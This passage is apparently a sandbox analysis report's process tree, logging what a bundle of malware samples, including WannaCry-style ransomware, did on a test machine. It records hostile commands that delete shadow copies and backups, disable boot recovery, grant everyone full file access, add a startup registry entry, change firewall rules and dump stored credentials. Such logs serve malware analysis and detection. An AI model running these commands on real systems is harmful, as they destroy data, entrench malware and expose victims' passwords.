        "C:\Windows\svchost.com" "C:\Windows\System32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\A880.tmp\spwak.vbs
        7⤵
        
        PID:5768
        
        C:\Windows\SysWOW64\wscript.exe
        
        C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Local\Temp\A880.tmp\spwak.vbs
        8⤵
        
        PID:656
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
    "[email protected]"
    3⤵
    - Executes dropped EXE
    - Enumerates connected drives
    PID:984
  - - C:\Windows\SysWOW64\netsh.exe
      C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
      4⤵
      Modifies Windows Firewall
      PID:412
  - - C:\Windows\SysWOW64\netsh.exe
      C:\Windows\system32\netsh.exe advfirewall reset
      4⤵
      Modifies Windows Firewall
      PID:5132
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___W9D8F_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      4⤵
      PID:7368
  - - C:\Windows\SysWOW64\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___LNVH9E_.txt
      4⤵
      Opens file in notepad (likely ransom note)
      PID:7652
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit
      4⤵
      PID:2108
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /c taskkill /f /im E > NUL & ping -n 1 127.0.0.1 > NUL & del C > NUL && exit
        5⤵
        
        PID:4396
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im E
        6⤵
        Kills process with taskkill
        
        PID:5064
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 1 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:2140
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
    "[email protected]"
    3⤵
    - Executes dropped EXE
    PID:1844
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
    "[email protected]"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1492
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h .
      4⤵
      Views/modifies file attributes
      PID:1988
  - - C:\Windows\SysWOW64\icacls.exe
      icacls . /grant Everyone:F /T /C /Q
      4⤵
      Modifies file permissions
      PID:3176
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      Executes dropped EXE
      PID:1540
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 209181712684732.bat
      4⤵
      PID:1432
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe //nologo m.vbs
        5⤵
        
        PID:3028
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +s F:\$RECYCLE
      4⤵
      Views/modifies file attributes
      PID:4300
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:5220
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:5656
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:6612
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected] co
      4⤵
      PID:6740
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c start /b @[email protected] vs
      4⤵
      PID:2488
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
        
        @[email protected] vs
        5⤵
        
        PID:5968
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        6⤵
        
        PID:5628
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        7⤵
        
        PID:3096
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6228
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:7964
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ipfnigovuw360" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
      4⤵
      PID:6592
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:6476
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5136
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3204
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:8168
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:3344
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3484
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:6300
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6368
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:8180
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:8188
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5540
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:7300
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:7164
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:8176
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:1264
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2904
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:7204
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:7640
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:7680
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6416
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5096
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:7680
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:3160
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6476
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:368
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6036
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5968
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:1540
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:468
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:7132
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2584
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:7616
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3656
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2140
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:2604
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3660
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:5184
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6392
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:4568
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:7876
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:7872
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:2472
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:3032
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6168
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:1740
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5672
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:7872
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:1260
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4888
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:2072
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:3152
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:1832
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:8072
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:3000
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4608
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6944
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:7432
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:1908
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:4592
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5764
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6060
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:4608
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:7076
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:7416
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:3428
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6352
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:1944
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:3916
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6572
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6516
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6400
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:4444
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:4012
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5852
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:2756
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:5980
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:3028
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3916
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:1612
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:7396
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:7724
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4556
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6208
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:5752
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:396
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5192
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4860
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6980
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:320
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4184
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:4396
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:264
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:5220
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:4860
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:4984
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:5860
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:7632
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:8100
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:2236
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:7876
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3176
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6112
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:5172
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:4256
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5516
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:7860
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:7300
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:7656
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:320
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:4932
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:1288
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6616
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:2492
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6416
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:6404
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6560
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:8092
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:5664
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6592
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:984
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:3528
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:4024
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:1288
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:6492
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:1104
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:5544
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:6060
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
      taskdl.exe
      4⤵
      PID:8148
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      4⤵
      PID:8072
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
      @[email protected]
      4⤵
      PID:3608
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
    "RIP_YOUR_PC_LOL.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4460
  - - C:\Users\Admin\Desktop\1.exe
      "C:\Users\Admin\Desktop\1.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:556
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\24E8.tmp\24E9.tmp\24EA.bat C:\Users\Admin\Desktop\1.exe"
        5⤵
        
        PID:4568
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s6
        6⤵
        
        PID:4340
  - - C:\Users\Admin\Desktop\10.exe
      "C:\Users\Admin\Desktop\10.exe"
      4⤵
      PID:5408
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h .
        5⤵
        Views/modifies file attributes
        
        PID:5772
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls . /grant Everyone:F /T /C /Q
        5⤵
        Modifies file permissions
        
        PID:5780
  - - C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2.doc" /o ""
      4⤵
      PID:5804
  - - C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\3.xlsx"
      4⤵
      PID:5964
  - - C:\Users\Admin\Desktop\5.exe
      "C:\Users\Admin\Desktop\5.exe"
      4⤵
      PID:6020
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\PROGRA~3\system.exe"
        5⤵
        
        PID:556
      - C:\PROGRA~3\system.exe
        
        C:\PROGRA~3\system.exe
        6⤵
        
        PID:3368
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\ProgramData\system.exe" "system.exe" ENABLE
        7⤵
        Modifies Windows Firewall
        
        PID:4848
  - - C:\Users\Admin\Desktop\6.exe
      "C:\Users\Admin\Desktop\6.exe"
      4⤵
      PID:6072
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OzyqjV8kGO.bat"
        5⤵
        
        PID:6428
      - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        6⤵
        
        PID:4668
      - C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApi.ProxyStub\SearchApp.exe
        
        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApi.ProxyStub\SearchApp.exe"
        6⤵
        
        PID:1560
  - - C:\Users\Admin\Desktop\7.exe
      "C:\Users\Admin\Desktop\7.exe"
      4⤵
      PID:6124
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
        5⤵
        
        PID:6712
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
        5⤵
        
        PID:1604
  - - C:\Users\Admin\Desktop\8.exe
      "C:\Users\Admin\Desktop\8.exe"
      4⤵
      PID:2724
    - - C:\Windows\system32\wbem\wmic.exe
        
        "C:\vka\..\Windows\m\..\system32\c\..\wbem\y\ggqtq\kjisp\..\..\..\wmic.exe" shadowcopy delete
        5⤵
        
        PID:6488
  - - C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\9.docm" /o ""
      4⤵
      PID:2584
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
    "ska2pwej.aeh.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4388
  - - C:\Users\Admin\AppData\Local\Temp\is-L7GA1.tmp\ska2pwej.aeh.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-L7GA1.tmp\ska2pwej.aeh.tmp" /SL5="$10266,4511977,830464,C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"
      4⤵
      Executes dropped EXE
      PID:4940
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe
    "x2s443bc.cs1.exe"
    3⤵
    PID:5232
  - - C:\Users\Admin\AppData\Local\Temp\is-MF5VU.tmp\x2s443bc.cs1.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-MF5VU.tmp\x2s443bc.cs1.tmp" /SL5="$2026E,15784509,779776,C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"
      4⤵
      PID:5452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=3788 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:1
1⤵
PID:1624

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5316 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:1
1⤵
PID:2532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
